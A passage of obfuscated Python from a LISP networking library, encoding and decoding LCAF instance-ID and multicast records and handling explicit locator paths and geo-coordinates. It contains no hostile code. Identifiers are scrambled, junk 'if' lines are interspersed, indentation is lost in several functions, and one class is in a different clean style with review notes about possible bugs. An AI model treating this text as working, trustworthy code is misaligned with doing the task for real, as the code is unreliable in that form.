return ( self . print_address_no_iid ( ) == IIIIIi )
if 40 - 40: I1IiiI / I1ii11iIi11i / Oo0Ooo
if ( self . is_ipv6 ( ) ) :
IIIIIi = lisp_myrlocs [ 1 ]
if ( IIIIIi == None ) : return ( False )
IIIIIi = IIIIIi . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == IIIIIi )
if 28 - 28: OoO0O00 / I1ii11iIi11i % OOooOOo % I1IiiI + Ii1I
return ( False )
if 6 - 6: o0oOOo0O0Ooo % OOooOOo
if 71 - 71: oO0o + II111iiii * O0 / i11iIiiIii * o0oOOo0O0Ooo
def store_iid_range ( self , iid , mask_len ) :
if ( self . afi == LISP_AFI_NONE ) :
if ( iid == 0 and mask_len == 0 ) : self . afi = LISP_AFI_ULTIMATE_ROOT
else : self . afi = LISP_AFI_IID_RANGE
if 85 - 85: o0oOOo0O0Ooo - I1Ii111
self . instance_id = iid
self . mask_len = mask_len
if 90 - 90: OoO0O00 * I1Ii111 * iII111i * Ii1I + OoOoOO00 / iII111i
if 63 - 63: o0oOOo0O0Ooo * I1Ii111
def lcaf_length ( self , lcaf_type ) :
iiiIIiiIi = self . addr_length ( ) + 2
if ( lcaf_type == LISP_LCAF_AFI_LIST_TYPE ) : iiiIIiiIi += 4
if ( lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE ) : iiiIIiiIi += 4
if ( lcaf_type == LISP_LCAF_ASN_TYPE ) : iiiIIiiIi += 4
if ( lcaf_type == LISP_LCAF_APP_DATA_TYPE ) : iiiIIiiIi += 8
if ( lcaf_type == LISP_LCAF_GEO_COORD_TYPE ) : iiiIIiiIi += 12
if ( lcaf_type == LISP_LCAF_OPAQUE_TYPE ) : iiiIIiiIi += 0
if ( lcaf_type == LISP_LCAF_NAT_TYPE ) : iiiIIiiIi += 4
if ( lcaf_type == LISP_LCAF_NONCE_LOC_TYPE ) : iiiIIiiIi += 4
if ( lcaf_type == LISP_LCAF_MCAST_INFO_TYPE ) : iiiIIiiIi = iiiIIiiIi * 2 + 8
if ( lcaf_type == LISP_LCAF_ELP_TYPE ) : iiiIIiiIi += 0
if ( lcaf_type == LISP_LCAF_SECURITY_TYPE ) : iiiIIiiIi += 6
if ( lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE ) : iiiIIiiIi += 4
if ( lcaf_type == LISP_LCAF_RLE_TYPE ) : iiiIIiiIi += 4
return ( iiiIIiiIi )
if 9 - 9: ooOoO0o . O0 + II111iiii . OoooooooOO
if 97 - 97: O0 / OoOoOO00 / ooOoO0o
if 11 - 11: II111iiii . i11iIiiIii - Ii1I . IiII
if 10 - 10: OOooOOo * OoooooooOO
if 12 - 12: II111iiii - O0 . i1IIi % oO0o % OoooooooOO
if 36 - 36: IiII * OoOoOO00 - iIii1I11I1II1 + II111iiii
if 65 - 65: I1IiiI * I11i . I1Ii111 % I1ii11iIi11i + O0
if 91 - 91: OoooooooOO % I1Ii111 * OoO0O00 - OoOoOO00
if 5 - 5: iIii1I11I1II1 * I11i - oO0o % oO0o % o0oOOo0O0Ooo . i1IIi
if 95 - 95: Oo0Ooo * I1ii11iIi11i + iII111i - o0oOOo0O0Ooo - Oo0Ooo . OoO0O00
if 62 - 62: I11i
if 58 - 58: I11i . OoOoOO00 + iII111i . iII111i
if 43 - 43: I1Ii111 + I1Ii111 % Oo0Ooo % OoO0O00 - ooOoO0o
if 61 - 61: OoOoOO00 + Ii1I % i11iIiiIii - I1IiiI * OoO0O00 % iIii1I11I1II1
if 66 - 66: iII111i + i1IIi
if 24 - 24: O0 / OoooooooOO - OoOoOO00
if 51 - 51: OoO0O00 + o0oOOo0O0Ooo - II111iiii * I11i + Ii1I
 def lcaf_encode_iid ( self ) :
  # Encode this EID as an LCAF Instance-ID (type 2) record: LCAF header,
  # 32-bit instance-id, 16-bit AFI, then the packed address. Returns bytes.
  O000oo0O0OO0 = LISP_LCAF_INSTANCE_ID_TYPE
  O0III1Iiii1i11 = socket . htons ( self . lcaf_length ( O000oo0O0OO0 ) )
  o0OoO0000o = self . instance_id
  O000oOOoOOO = self . afi
  o00O0Oo = 0
  # Negative AFIs are internal pseudo-AFIs needing special wire encoding.
  if ( O000oOOoOOO < 0 ) :
   if ( self . afi == LISP_AFI_GEO_COORD ) :
    O000oOOoOOO = LISP_AFI_LCAF
    o00O0Oo = 0
   else :
    # IID-range/root: AFI 0 with the range width in the mask-len byte.
    O000oOOoOOO = 0
    o00O0Oo = self . mask_len
  if 16 - 16: I1Ii111 * i1IIi . I1IiiI . OOooOOo % Ii1I - o0oOOo0O0Ooo
  if 89 - 89: Ii1I * I1ii11iIi11i * I1IiiI % iII111i % Ii1I + O0
  if 53 - 53: i11iIiiIii % I1ii11iIi11i
  oO0OoOo0oo = struct . pack ( "BBBBH" , 0 , 0 , O000oo0O0OO0 , o00O0Oo , O0III1Iiii1i11 )
  oO0OoOo0oo += struct . pack ( "IH" , socket . htonl ( o0OoO0000o ) , socket . htons ( O000oOOoOOO ) )
  # AFI 0 records carry no address body.
  if ( O000oOOoOOO == 0 ) : return ( oO0OoOo0oo )
  if 63 - 63: IiII + oO0o + II111iiii * I11i
  # Geo-coord: drop the 2-byte AFI just written and splice in a nested
  # Geo-Coordinate LCAF instead.
  if ( self . afi == LISP_AFI_GEO_COORD ) :
   oO0OoOo0oo = oO0OoOo0oo [ 0 : - 2 ]
   oO0OoOo0oo += self . address . encode_geo ( )
   return ( oO0OoOo0oo )
  if 49 - 49: OoO0O00
  if 78 - 78: I1IiiI - I1ii11iIi11i
  oO0OoOo0oo += self . pack_address ( )
  return ( oO0OoOo0oo )
if 24 - 24: Ii1I + I11i
if 5 - 5: I1Ii111 . Ii1I - ooOoO0o % OoooooooOO
 def lcaf_decode_iid ( self , packet ) :
  # Parse an LCAF Instance-ID record from packet, setting instance_id,
  # afi, mask_len and address. Returns the unconsumed bytes, or None on
  # a truncated/unexpected buffer.
  O00oO00oOO00O = "BBBBH"
  ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
  if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
  if 2 - 2: OOooOOo . IiII . iII111i / Oo0Ooo
  # Fields: rsvd1, flags, lcaf-type, iid-mask-len, lcaf-length.
  O0o000 , o00oo0 , O000oo0O0OO0 , o0Ooo , iiiIIiiIi = struct . unpack ( O00oO00oOO00O ,
   packet [ : ooOoooOoo0oO ] )
  packet = packet [ ooOoooOoo0oO : : ]
  if 34 - 34: OoooooooOO % OoOoOO00 * o0oOOo0O0Ooo . oO0o
  if ( O000oo0O0OO0 != LISP_LCAF_INSTANCE_ID_TYPE ) : return ( None )
  if 94 - 94: O0 . I1ii11iIi11i . i11iIiiIii - I1Ii111 . IiII + oO0o
  O00oO00oOO00O = "IH"
  ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
  if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
  if 48 - 48: OoOoOO00 * I11i
  o0OoO0000o , O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
  packet = packet [ ooOoooOoo0oO : : ]
  if 92 - 92: I1IiiI * I1IiiI
  iiiIIiiIi = socket . ntohs ( iiiIIiiIi )
  self . instance_id = socket . ntohl ( o0OoO0000o )
  O000oOOoOOO = socket . ntohs ( O000oOOoOOO )
  self . afi = O000oOOoOOO
  # AFI 0 with a non-zero mask-len encodes an IID-range prefix.
  if ( o0Ooo != 0 and O000oOOoOOO == 0 ) : self . mask_len = o0Ooo
  if ( O000oOOoOOO == 0 ) :
   self . afi = LISP_AFI_IID_RANGE if o0Ooo else LISP_AFI_ULTIMATE_ROOT
  if 9 - 9: IiII * I1IiiI * OoO0O00 - I1IiiI * I1IiiI - OoO0O00
  if 20 - 20: i1IIi + I1IiiI + i11iIiiIii + II111iiii + i1IIi
  if 18 - 18: i11iIiiIii * O0 * Oo0Ooo + iII111i + OOooOOo
  if 62 - 62: OOooOOo - oO0o + i1IIi % Ii1I . I1Ii111 . II111iiii
  if 94 - 94: OOooOOo - I1IiiI
  # No address body follows for IID-range / ultimate-root records.
  if ( O000oOOoOOO == 0 ) : return ( packet )
  if 35 - 35: i11iIiiIii
  if 27 - 27: O0 % i11iIiiIii - I1Ii111 * oO0o - I11i / Oo0Ooo
  if 78 - 78: O0 * i11iIiiIii
  if 62 - 62: OoO0O00 * I1Ii111 * Ii1I / ooOoO0o
  # Distinguished-name: variable-length string body.
  if ( self . is_dist_name ( ) ) :
   packet , self . address = lisp_decode_dist_name ( packet )
   self . mask_len = len ( self . address ) * 8
   return ( packet )
  if 27 - 27: oO0o . iII111i . oO0o
  if 37 - 37: Oo0Ooo . I1ii11iIi11i / OoooooooOO % ooOoO0o / I1IiiI + ooOoO0o
  if 14 - 14: I11i + ooOoO0o . oO0o * I11i
  if 98 - 98: Ii1I . i1IIi * OoO0O00 * Ii1I * iIii1I11I1II1
  if 22 - 22: OoooooooOO - OoO0O00 + OoOoOO00 - OOooOOo + i11iIiiIii - oO0o
  # Nested LCAF: only a Geo-Coordinate payload is understood here.
  if ( O000oOOoOOO == LISP_AFI_LCAF ) :
   O00oO00oOO00O = "BBBBH"
   ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
   if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
   if 9 - 9: I1Ii111 - i1IIi . ooOoO0o
   i111IiI1III1 , ooOOooooo0Oo , O000oo0O0OO0 , I1iii1IiI11I11I , iiii1 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
   if 33 - 33: I11i
   if 37 - 37: Oo0Ooo
   if ( O000oo0O0OO0 != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
   if 36 - 36: IiII % I11i
   iiii1 = socket . ntohs ( iiii1 )
   packet = packet [ ooOoooOoo0oO : : ]
   if ( iiii1 > len ( packet ) ) : return ( None )
   if 72 - 72: oO0o % I11i % OOooOOo * iIii1I11I1II1 - OOooOOo % O0
   iiIi1ii1IiI = lisp_geo ( "" )
   self . afi = LISP_AFI_GEO_COORD
   self . address = iiIi1ii1IiI
   packet = iiIi1ii1IiI . decode_geo ( packet , iiii1 , I1iii1IiI11I11I )
   self . mask_len = self . host_mask_len ( )
   return ( packet )
  if 84 - 84: oO0o - o0oOOo0O0Ooo / II111iiii . o0oOOo0O0Ooo
  if 82 - 82: OoooooooOO
  # Fixed-length binary address (IPv4/IPv6/MAC/E.164).
  O0III1Iiii1i11 = self . addr_length ( )
  if ( len ( packet ) < O0III1Iiii1i11 ) : return ( None )
  if 14 - 14: OoO0O00 / oO0o - OOooOOo
  packet = self . unpack_address ( packet )
  return ( packet )
if 100 - 100: IiII - I11i . iIii1I11I1II1 / iIii1I11I1II1
if 16 - 16: IiII + Oo0Ooo % I11i
if 16 - 16: ooOoO0o / I1Ii111
if 78 - 78: OoOoOO00 - II111iiii - OOooOOo + I1IiiI + O0 / I1IiiI
if 59 - 59: OOooOOo . I1IiiI / i1IIi / II111iiii . II111iiii
if 54 - 54: iIii1I11I1II1 % ooOoO0o
if 37 - 37: OOooOOo % OoOoOO00 - II111iiii * o0oOOo0O0Ooo . I1IiiI . OoOoOO00
if 92 - 92: I11i + OoO0O00 . OoooooooOO
if 3 - 3: OoO0O00 % iIii1I11I1II1
if 62 - 62: OoooooooOO * o0oOOo0O0Ooo
if 59 - 59: iIii1I11I1II1
if 18 - 18: ooOoO0o % I1IiiI / iIii1I11I1II1 + O0
if 99 - 99: i11iIiiIii - o0oOOo0O0Ooo + o0oOOo0O0Ooo . OoooooooOO * iII111i . Oo0Ooo
if 63 - 63: I11i
if 60 - 60: I1IiiI / I1ii11iIi11i / I11i / Ii1I + iIii1I11I1II1
if 85 - 85: O0 / OOooOOo . OoOoOO00 / I1ii11iIi11i
if 80 - 80: I1ii11iIi11i * iII111i % i1IIi * OOooOOo % II111iiii % i1IIi
if 44 - 44: OoooooooOO
if 18 - 18: i11iIiiIii
if 65 - 65: i1IIi . iIii1I11I1II1 % iIii1I11I1II1
if 35 - 35: iIii1I11I1II1 - o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - OOooOOo . o0oOOo0O0Ooo
 def lcaf_encode_sg ( self , group ) :
  # Encode (self, group) as an LCAF Multicast-Info (S,G) record; both
  # addresses are written AFI-first. Returns the packed bytes.
  O000oo0O0OO0 = LISP_LCAF_MCAST_INFO_TYPE
  o0OoO0000o = socket . htonl ( self . instance_id )
  O0III1Iiii1i11 = socket . htons ( self . lcaf_length ( O000oo0O0OO0 ) )
  # Header fields: rsvd, flags, type, rsvd, length, iid, rsvd,
  # source-mask-len, group-mask-len.
  oO0OoOo0oo = struct . pack ( "BBBBHIHBB" , 0 , 0 , O000oo0O0OO0 , 0 , O0III1Iiii1i11 , o0OoO0000o ,
   0 , self . mask_len , group . mask_len )
  if 12 - 12: iIii1I11I1II1 % OoO0O00 * Oo0Ooo
  oO0OoOo0oo += struct . pack ( "H" , socket . htons ( self . afi ) )
  oO0OoOo0oo += self . pack_address ( )
  oO0OoOo0oo += struct . pack ( "H" , socket . htons ( group . afi ) )
  oO0OoOo0oo += group . pack_address ( )
  return ( oO0OoOo0oo )
if 5 - 5: I11i - II111iiii * iIii1I11I1II1 / iIii1I11I1II1 % IiII * i1IIi
if 30 - 30: i1IIi % I1IiiI . OOooOOo % iIii1I11I1II1 . I1ii11iIi11i / o0oOOo0O0Ooo
 def lcaf_decode_sg ( self , packet ) :
  # Parse an LCAF Multicast-Info record. self receives the source/EID;
  # returns [remaining-packet, group-address], or [None, None] on a
  # truncated or non-multicast record.
  O00oO00oOO00O = "BBBBHIHBB"
  ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
  if ( len ( packet ) < ooOoooOoo0oO ) : return ( [ None , None ] )
  if 53 - 53: OOooOOo % ooOoO0o
  # Fields: rsvd1, flags, type, rsvd2, length, iid, rsvd3,
  # source-mask-len, group-mask-len.
  O0o000 , o00oo0 , O000oo0O0OO0 , O0Ooo000OO00 , iiiIIiiIi , o0OoO0000o , OOOoo0Oo , O000O00oOO , o0o0oOo00Oo = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
  if 94 - 94: ooOoO0o / Ii1I
  packet = packet [ ooOoooOoo0oO : : ]
  if 9 - 9: I1Ii111 * oO0o
  if ( O000oo0O0OO0 != LISP_LCAF_MCAST_INFO_TYPE ) : return ( [ None , None ] )
  if 44 - 44: ooOoO0o * oO0o
  self . instance_id = socket . ntohl ( o0OoO0000o )
  # Payload bytes remaining after the 8 fixed bytes that follow the
  # length field.
  iiiIIiiIi = socket . ntohs ( iiiIIiiIi ) - 8
  if 67 - 67: iIii1I11I1II1 . iIii1I11I1II1 + iIii1I11I1II1 * iII111i
  if 70 - 70: I1IiiI - I11i / iIii1I11I1II1 . I1IiiI % I1ii11iIi11i
  if 12 - 12: Oo0Ooo + I1IiiI
  if 12 - 12: OoOoOO00 / II111iiii
  if 100 - 100: I1ii11iIi11i % iIii1I11I1II1 . IiII . OoooooooOO / II111iiii
  # Source: 16-bit AFI, then the packed address into self.
  O00oO00oOO00O = "H"
  ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
  if ( len ( packet ) < ooOoooOoo0oO ) : return ( [ None , None ] )
  if ( iiiIIiiIi < ooOoooOoo0oO ) : return ( [ None , None ] )
  if 28 - 28: I1IiiI
  O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
  packet = packet [ ooOoooOoo0oO : : ]
  iiiIIiiIi -= ooOoooOoo0oO
  self . afi = socket . ntohs ( O000oOOoOOO )
  self . mask_len = O000O00oOO
  O0III1Iiii1i11 = self . addr_length ( )
  if ( iiiIIiiIi < O0III1Iiii1i11 ) : return ( [ None , None ] )
  if 27 - 27: I1IiiI % oO0o - iIii1I11I1II1 - o0oOOo0O0Ooo - IiII - O0
  packet = self . unpack_address ( packet )
  if ( packet == None ) : return ( [ None , None ] )
  if 46 - 46: II111iiii
  iiiIIiiIi -= O0III1Iiii1i11
  if 24 - 24: i11iIiiIii * i1IIi - I11i + o0oOOo0O0Ooo
  if 60 - 60: ooOoO0o
  if 62 - 62: i11iIiiIii
  if 88 - 88: i11iIiiIii
  if 59 - 59: oO0o - OoooooooOO % ooOoO0o
  # Group: same AFI + address layout, decoded into a fresh lisp_address
  # carrying the same instance-id.
  O00oO00oOO00O = "H"
  ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
  if ( len ( packet ) < ooOoooOoo0oO ) : return ( [ None , None ] )
  if ( iiiIIiiIi < ooOoooOoo0oO ) : return ( [ None , None ] )
  if 90 - 90: OoOoOO00
  O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
  packet = packet [ ooOoooOoo0oO : : ]
  iiiIIiiIi -= ooOoooOoo0oO
  O0o00oOOOO00 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
  O0o00oOOOO00 . afi = socket . ntohs ( O000oOOoOOO )
  O0o00oOOOO00 . mask_len = o0o0oOo00Oo
  O0o00oOOOO00 . instance_id = self . instance_id
  # NOTE(review): length check below uses self.addr_length(), not the
  # group's own AFI - confirm source and group AFIs always match.
  O0III1Iiii1i11 = self . addr_length ( )
  if ( iiiIIiiIi < O0III1Iiii1i11 ) : return ( [ None , None ] )
  if 96 - 96: II111iiii % Ii1I
  packet = O0o00oOOOO00 . unpack_address ( packet )
  if ( packet == None ) : return ( [ None , None ] )
  if 84 - 84: I1IiiI . I1IiiI
  return ( [ packet , O0o00oOOOO00 ] )
if 82 - 82: OoO0O00 - iIii1I11I1II1 . iIii1I11I1II1 + I1ii11iIi11i
if 45 - 45: iII111i . oO0o * iII111i
 def lcaf_decode_eid ( self , packet ) :
  # Peek at the LCAF type byte and dispatch to the matching decoder.
  # Returns [remaining-packet, group-or-None]; None values on error.
  O00oO00oOO00O = "BBB"
  ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
  if ( len ( packet ) < ooOoooOoo0oO ) : return ( [ None , None ] )
  if 3 - 3: OoOoOO00 / Oo0Ooo - Oo0Ooo
  if 54 - 54: Oo0Ooo . OoO0O00 * I1IiiI % IiII
  if 97 - 97: o0oOOo0O0Ooo + Ii1I
  if 77 - 77: I11i - oO0o . Ii1I
  if 75 - 75: I11i * OoooooooOO % OoOoOO00 . i1IIi - Ii1I + iIii1I11I1II1
  # Fields: rsvd, flags, lcaf-type. The header is NOT consumed here;
  # the type-specific decoders re-parse it from the start of packet.
  O0Ooo000OO00 , ooOOooooo0Oo , O000oo0O0OO0 = struct . unpack ( O00oO00oOO00O ,
   packet [ : ooOoooOoo0oO ] )
  if 74 - 74: ooOoO0o
  if ( O000oo0O0OO0 == LISP_LCAF_INSTANCE_ID_TYPE ) :
   return ( [ self . lcaf_decode_iid ( packet ) , None ] )
  elif ( O000oo0O0OO0 == LISP_LCAF_MCAST_INFO_TYPE ) :
   packet , O0o00oOOOO00 = self . lcaf_decode_sg ( packet )
   return ( [ packet , O0o00oOOOO00 ] )
  elif ( O000oo0O0OO0 == LISP_LCAF_GEO_COORD_TYPE ) :
   # Inline Geo-Coordinate LCAF with instance-id forced to 0.
   O00oO00oOO00O = "BBBBH"
   ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
   if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
   if 18 - 18: iIii1I11I1II1 - I11i - oO0o
   i111IiI1III1 , ooOOooooo0Oo , O000oo0O0OO0 , I1iii1IiI11I11I , iiii1 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
   if 12 - 12: O0 + O0 + ooOoO0o . I1IiiI * II111iiii
   if 47 - 47: i11iIiiIii % OOooOOo / ooOoO0o . IiII - I1IiiI
   if ( O000oo0O0OO0 != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
   if 10 - 10: Oo0Ooo / ooOoO0o / I1ii11iIi11i
   iiii1 = socket . ntohs ( iiii1 )
   packet = packet [ ooOoooOoo0oO : : ]
   if ( iiii1 > len ( packet ) ) : return ( None )
   if 98 - 98: O0 - I1Ii111 - i11iIiiIii
   iiIi1ii1IiI = lisp_geo ( "" )
   self . instance_id = 0
   self . afi = LISP_AFI_GEO_COORD
   self . address = iiIi1ii1IiI
   packet = iiIi1ii1IiI . decode_geo ( packet , iiii1 , I1iii1IiI11I11I )
   self . mask_len = self . host_mask_len ( )
   if 85 - 85: II111iiii - I1ii11iIi11i % I1IiiI . I1IiiI - OoooooooOO - I11i
  # Unknown LCAF types fall through with the packet unconsumed.
  return ( [ packet , None ] )
if 38 - 38: i1IIi + oO0o * ooOoO0o % Ii1I % ooOoO0o
if 80 - 80: OoO0O00 + OoOoOO00 % iII111i % OoooooooOO - ooOoO0o
if 25 - 25: OoOoOO00 % i11iIiiIii - I1IiiI * iIii1I11I1II1 - Oo0Ooo . O0
if 48 - 48: I1IiiI + oO0o % i11iIiiIii % iIii1I11I1II1
if 14 - 14: iIii1I11I1II1
if 78 - 78: I1Ii111 / Oo0Ooo - I1Ii111
class lisp_elp_node ( ) :
    """One hop of an Explicit Locator Path (ELP)."""

    def __init__ ( self ) :
        self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.probe = False         # request RLOC-probing to this hop
        self.strict = False        # hop must be used (strict ELP)
        self.eid = False           # hop address is an EID, not an RLOC
        self.we_are_last = False   # set when this node is us and last

    def copy_elp_node ( self ) :
        """Return a copy of this ELP node."""
        clone = lisp_elp_node()
        # NOTE(review): copy_address() is resolved on the new node at call
        # time; it is not defined in this class here - confirm it is
        # provided elsewhere.
        clone.copy_address(self.address)
        for flag in ("probe", "strict", "eid", "we_are_last"):
            setattr(clone, flag, getattr(self, flag))
        return(clone)
if 66 - 66: OoOoOO00 . iII111i
if 1 - 1: iII111i * i1IIi . iIii1I11I1II1 % O0 - OoooooooOO
if 87 - 87: iII111i . Oo0Ooo * i11iIiiIii % o0oOOo0O0Ooo + Ii1I
class lisp_elp ( ) :
 # An Explicit Locator Path: an ordered list of lisp_elp_node hops plus
 # the hop we currently forward to (use_elp_node).
 def __init__ ( self , name ) :
  self . elp_name = name
  self . elp_nodes = [ ]
  self . use_elp_node = None
  self . we_are_last = False
 if 72 - 72: Ii1I / II111iiii + o0oOOo0O0Ooo
 if 33 - 33: I1Ii111 * OoOoOO00 - OoooooooOO
 def copy_elp ( self ) :
  # Deep-copy this ELP; each node is copied via copy_elp_node().
  Ii1111i = lisp_elp ( self . elp_name )
  Ii1111i . use_elp_node = self . use_elp_node
  Ii1111i . we_are_last = self . we_are_last
  for Ooo0o0OoOO in self . elp_nodes :
   Ii1111i . elp_nodes . append ( Ooo0o0OoOO . copy_elp_node ( ) )
  if 11 - 11: I1Ii111 - Oo0Ooo / iIii1I11I1II1 - OoooooooOO
  return ( Ii1111i )
 if 71 - 71: Oo0Ooo + Ii1I - OoooooooOO + I11i - iIii1I11I1II1 / O0
 if 76 - 76: i11iIiiIii % o0oOOo0O0Ooo . O0 * I11i
 def print_elp ( self , want_marker ) :
  # Render "addr(rPS), ..." per hop. With want_marker, '*' flags the
  # selected next hop and 'x' flags us when we are the last hop.
  OoOo0Oo0 = ""
  for Ooo0o0OoOO in self . elp_nodes :
   Oo0000 = ""
   if ( want_marker ) :
    if ( Ooo0o0OoOO == self . use_elp_node ) :
     Oo0000 = "*"
    elif ( Ooo0o0OoOO . we_are_last ) :
     Oo0000 = "x"
    if 76 - 76: iIii1I11I1II1
   if 55 - 55: II111iiii % O0 * O0 - II111iiii * I1IiiI % Oo0Ooo
   OoOo0Oo0 += "{}{}({}{}{}), " . format ( Oo0000 ,
    Ooo0o0OoOO . address . print_address_no_iid ( ) ,
    "r" if Ooo0o0OoOO . eid else "R" , "P" if Ooo0o0OoOO . probe else "p" ,
    "S" if Ooo0o0OoOO . strict else "s" )
  if 48 - 48: I1ii11iIi11i + OoooooooOO % i1IIi
  # Strip the trailing ", ".
  return ( OoOo0Oo0 [ 0 : - 2 ] if OoOo0Oo0 != "" else "" )
 if 46 - 46: OoOoOO00
 if 75 - 75: I1IiiI
 def select_elp_node ( self ) :
  # Find ourselves in the path (by matching our IPv4/IPv6 RLOCs) and
  # select the hop AFTER us as use_elp_node.
  Ii1II111i1 , iii1i , OoO0o0OOOO = lisp_myrlocs
  ooo = None
  if 100 - 100: OOooOOo * OoooooooOO
  for Ooo0o0OoOO in self . elp_nodes :
   if ( Ii1II111i1 and Ooo0o0OoOO . address . is_exact_match ( Ii1II111i1 ) ) :
    ooo = self . elp_nodes . index ( Ooo0o0OoOO )
    break
   if 80 - 80: O0 + oO0o - OoooooooOO - O0 . ooOoO0o . OoooooooOO
   if ( iii1i and Ooo0o0OoOO . address . is_exact_match ( iii1i ) ) :
    ooo = self . elp_nodes . index ( Ooo0o0OoOO )
    break
   if 76 - 76: Ii1I
  if 62 - 62: O0 / OoO0O00 % i11iIiiIii / OOooOOo * iIii1I11I1II1
  if 78 - 78: OOooOOo % O0 * O0
  if 62 - 62: ooOoO0o
  if 77 - 77: I1IiiI . i11iIiiIii - I1ii11iIi11i
  if 83 - 83: OoO0O00 - i11iIiiIii + I1ii11iIi11i - OOooOOo / OoOoOO00 / I11i
  if 53 - 53: I11i * I1IiiI . I1IiiI / o0oOOo0O0Ooo - I1Ii111
  # Not in the path: forward to the first hop.
  # NOTE(review): Ooo0o0OoOO below is the leftover loop variable; with an
  # empty elp_nodes list this raises NameError (and elp_nodes[0] would
  # raise IndexError) - confirm callers guarantee a non-empty list.
  if ( ooo == None ) :
   self . use_elp_node = self . elp_nodes [ 0 ]
   Ooo0o0OoOO . we_are_last = False
   return
  if 50 - 50: I11i - OoOoOO00 + I1IiiI % Oo0Ooo / OoooooooOO - I1ii11iIi11i
  if 26 - 26: IiII . Ii1I
  if 35 - 35: I1ii11iIi11i + OOooOOo
  if 88 - 88: O0
  if 4 - 4: OoOoOO00 % iIii1I11I1II1 % OoooooooOO . oO0o
  if 27 - 27: II111iiii - OoOoOO00
  # We are the last hop: nothing to forward to.
  if ( self . elp_nodes [ - 1 ] == self . elp_nodes [ ooo ] ) :
   self . use_elp_node = None
   Ooo0o0OoOO . we_are_last = True
   return
  if 81 - 81: o0oOOo0O0Ooo - Oo0Ooo % IiII - ooOoO0o / O0
  if 27 - 27: Oo0Ooo
  if 15 - 15: iIii1I11I1II1 . OoOoOO00 % Ii1I / i1IIi . o0oOOo0O0Ooo
  if 45 - 45: iIii1I11I1II1 - i1IIi % I1IiiI - I1Ii111 + oO0o
  if 15 - 15: iIii1I11I1II1 - OoooooooOO / ooOoO0o
  # Otherwise forward to the hop following us.
  self . use_elp_node = self . elp_nodes [ ooo + 1 ]
  return
if 83 - 83: IiII + I1Ii111 / OoOoOO00 * IiII . oO0o
if 22 - 22: O0 + ooOoO0o + I1Ii111
if 57 - 57: OOooOOo . ooOoO0o - OoooooooOO - I1ii11iIi11i * O0
class lisp_geo ( ) :
def __init__ ( self , name ) :
self . geo_name = name
self . latitude = 0xffffffff
self . lat_mins = 0
self . lat_secs = 0
self . longitude = 0xffffffff
self . long_mins = 0
self . long_secs = 0
self . altitude = - 1
self . radius = 0
if 85 - 85: I1IiiI * OoO0O00
if 63 - 63: I1IiiI - i11iIiiIii
def copy_geo ( self ) :
iiIi1ii1IiI = lisp_geo ( self . geo_name )
iiIi1ii1IiI . latitude = self . latitude
iiIi1ii1IiI . lat_mins = self . lat_mins
iiIi1ii1IiI . lat_secs = self . lat_secs
iiIi1ii1IiI . longitude = self . longitude
iiIi1ii1IiI . long_mins = self . long_mins
iiIi1ii1IiI . long_secs = self . long_secs
iiIi1ii1IiI . altitude = self . altitude
iiIi1ii1IiI . radius = self . radius
return ( iiIi1ii1IiI )
if 4 - 4: OOooOOo + iIii1I11I1II1 / I1IiiI * Ii1I
if 64 - 64: OoOoOO00
 def no_geo_altitude ( self ) :
  # True when no altitude is configured/decoded; -1 is the marker value
  # set by __init__.
  return ( self . altitude == - 1 )
if 94 - 94: OOooOOo * OoooooooOO * o0oOOo0O0Ooo / I1Ii111 . II111iiii
if 37 - 37: O0 * II111iiii * I1IiiI - O0 - I11i / i1IIi
def parse_geo_string ( self , geo_str ) :
ooo = geo_str . find ( "]" )
if ( ooo != - 1 ) : geo_str = geo_str [ ooo + 1 : : ]
if 27 - 27: i11iIiiIii + iIii1I11I1II1
if 15 - 15: oO0o
if 69 - 69: II111iiii * O0 . ooOoO0o * IiII
if 25 - 25: I11i - I1ii11iIi11i . I1Ii111 . OoooooooOO
if 4 - 4: IiII * OoO0O00 % I1ii11iIi11i * Ii1I . iII111i
if ( geo_str . find ( "/" ) != - 1 ) :
geo_str , Iii1Ii1II1 = geo_str . split ( "/" )
self . radius = int ( Iii1Ii1II1 )
if 49 - 49: II111iiii % OOooOOo
if 19 - 19: I1ii11iIi11i - iIii1I11I1II1 % I1IiiI / OoooooooOO
geo_str = geo_str . split ( "-" )
if ( len ( geo_str ) < 8 ) : return ( False )
if 12 - 12: ooOoO0o / II111iiii + OoO0O00
iiIiiiI = geo_str [ 0 : 4 ]
i1i11i1Iii = geo_str [ 4 : 8 ]
if 11 - 11: I11i * Ii1I * I1IiiI - I1IiiI % OoooooooOO
if 83 - 83: i11iIiiIii % iII111i * O0 % OoooooooOO
if 99 - 99: I1ii11iIi11i % I1ii11iIi11i * iII111i % oO0o
if 56 - 56: Oo0Ooo + i11iIiiIii - oO0o . Ii1I + IiII
if ( len ( geo_str ) > 8 ) : self . altitude = int ( geo_str [ 8 ] )
if 19 - 19: I11i * OoooooooOO . i1IIi
if 100 - 100: II111iiii
if 95 - 95: iII111i
if 94 - 94: OoOoOO00 + OoooooooOO
